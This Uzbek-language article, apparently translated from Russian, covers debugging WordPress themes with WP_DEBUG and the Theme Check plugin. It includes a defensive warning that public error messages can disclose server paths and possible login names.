Xatolar mavjud bo'lsa, xatolik yuz bergan joyda muammo va ta'sirlangan fayllarni tavsiflovchi xabar ko'rsatiladi. Bu tahlil qilish xatolari yoki yadrodan olib tashlangan yoki yangilari bilan almashtirilgan eskirgan funktsiyalar bo'lishi mumkin.

Ogohlantirish bitta oddiy faktga asoslanadi: xato xabari serverning ildiz katalogiga nisbatan faylga mutlaq yo'lni o'z ichiga oladi. Xabar faqat administrator tomonidan emas, balki barcha foydalanuvchilar tomonidan ko'riladi. Tasviriy misol:

Tahlil xatosi: sintaksis xatosi, 23-qatordagi /u57109403/data/www/site.ru/wp-content/themes/default/index.php da kutilmagan “endif” (T_ENDIF)

Misoldan ko'rinib turibdiki, u57109403 qiymati serverga kirish uchun login bo'lishi mumkin va tajovuzkorlar faqat parolni taxmin qilishlari kerak. Ehtiyot bo'l.

Mavzuni tekshirish - WordPress mavzuni sinash vositasi

O'rnatilgan WP_DEBUG funktsiyasidan tashqari, mavzuingizni zamonaviy Codex standartlariga muvofiq sinab ko'rish uchun mo'ljallangan yaxshi ishlab chiquvchi vosita mavjud.

U Mavzuni tekshirish plagini sifatida amalga oshiriladi, uni rasmiy ombor sahifasidan yuklab olishingiz mumkin.

Plaginni faollashtirgandan so'ng, uning sahifasiga o'ting (Tashqi ko'rinish - Mavzuni tekshirish). Nosozliklarni tuzatish rejimi o'chirilgan bo'lsa, siz quyidagi xabarni ko'rasiz:

OGOHLANTIRISH WP_DEBUG yoqilmagan! Iltimos, yuklashdan oldin mavzuni disk raskadrovka yoqilgan holda sinab ko‘ring!

Ushbu rejimni qanday faollashtirishni maqolaning birinchi qismida tasvirlab berdim. Bu shart emas, lekin tahlilning to'liqligi uchun tavsiya etiladi. Tekshirishni boshlash uchun "Tekshirish" tugmasini bosing.

Agar siz mavzu fayllaringizning manba kodida kirill alifbosidan foydalansangiz, hisobotda bunday turdagi ma'lumotlarga duch kelishga tayyor bo'ling:

MA'LUMOT: Single.php faylida chop etilmaydigan belgilar topildi. Bu faylda xatolik borligini tekshirishni xohlashingiz mumkin.

Bunday xabarlarni ko'rsatishni "INFOni bostirish" yonidagi katakchani belgilash orqali o'chirib qo'yishingiz mumkin. Kelajak uchun eslatma: mavzuni mahalliylashtirishda inglizcha so'zlarni ruscha so'zlar bilan almashtirib, manba kodini tahrirlash o'rniga ru_RU.po va ru_RU.mo maxsus tarjima fayllaridan foydalaning.

Mavzuni tekshirish plagini WordPress mavzusini ishlab chiquvchilar va sayt ma'murlari uchun foydali bo'ladi. Hisobot joriy mavzu bo'yicha minimal talablarning standart to'plamini tekshirishga asoslangan va quyidagi belgilarni o'z ichiga oladi:

• Majburiy - talab qilinadigan funksiya, sinf yoki tavsif yo'q;
• Ogohlantirish - ogohlantirishlar, masalan, yashirin fayllar mavjudligi haqida;
• Tavsiya etiladi - yangi funktsiyalardan foydalanish bo'yicha tavsiyalar;
• Info - boshqa ma'lumot xabarlari.

Ko'pgina talablar funktsiyalar va parametrlarni tavsiflovchi Kodeksga havolalar bilan qo'llab-quvvatlanadi. Biroq, hisobot allaqachon ma'lumotga ega. Kichik bir parcha:

Sinov natijalariga ma'lum darajada ehtiyotkorlik bilan munosabatda bo'lish kerak. Plagin tomonidan tavsiya etilgan barcha funktsiyalardan mutlaqo foydalanmasligingiz kerak - ular orasida siz haqiqatdan ham foydalanishni rejalashtirmagan ba'zilari bo'lishi mumkin.

Nosozliklarni tuzatish rejimi va Theme Check plaginidan foydalanib, men eskirgan funksiyalar tufayli yuzaga kelgan bir qator muammolarni aniqlay oldim. functions.php-dagi ba'zi yaxshilanishlar keraksiz deb o'chirildi yoki so'nggi versiyalarda paydo bo'lgan standart echimlar bilan almashtirildi. Bloglaringizni ko'rib chiqishni tavsiya qilaman!